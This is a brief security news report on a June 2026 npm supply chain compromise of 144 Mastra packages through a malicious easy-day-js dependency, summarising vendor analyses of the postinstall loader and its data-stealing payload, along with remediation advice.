At least 144 npm packages tied to the Mastra namespace were compromised in a supply chain attack in June 2026, according to a technical analysis by Endor Labs. The campaign added a malicious dependency to widely used packages, including @mastra/core, which has more than 918,000 weekly downloads.
KEY FACTS
- Scope 144 @mastra packages were affected during an 88-minute publishing window.
- Entry point The malicious code arrived through a third-party dependency named easy-day-js.
- Delivery The payload ran during postinstall and fetched a second stage from attacker-controlled infrastructure.
- Impact The malware could steal browser data, cryptocurrency wallet information, and install persistence on Windows, macOS, and Linux.
- Account abuse The attack used the ehindero npm account, which had former Mastra scope access.
The report said the infected packages themselves did not contain malicious code. Instead, the dependency change introduced an obfuscated loader that disabled TLS certificate validation, downloaded a second-stage payload, and then erased itself to limit traces.
SafeDep said the easy-day-js package began as a clean clone of the dayjs date library before malicious changes were added on June 17, 2026. The disclosure said the final-stage malware could harvest browser history, collect data from more than 160 cryptocurrency wallet browser extensions, and receive commands from a command-and-control server.
JFrog said the campaign combined a decoy package, a postinstall loader, runtime payload download, detached execution, self-deletion, and remote module execution. The packages were later pulled from npm’s highest-profile listings and the latest tag was reverted.
StepSecurity said Mastra packages are often installed in environments that hold sensitive credentials, which increases the value of the ecosystem as a target. The company also said any workstation, CI runner, or build environment that installed affected versions should be treated as potentially compromised.
WHY IT MATTERS
The incident shows how a single package account and a small dependency change can expose large numbers of downstream installs before developers even use the code. Systems that installed the affected versions may need rollback, credential rotation, and host review to reduce risk.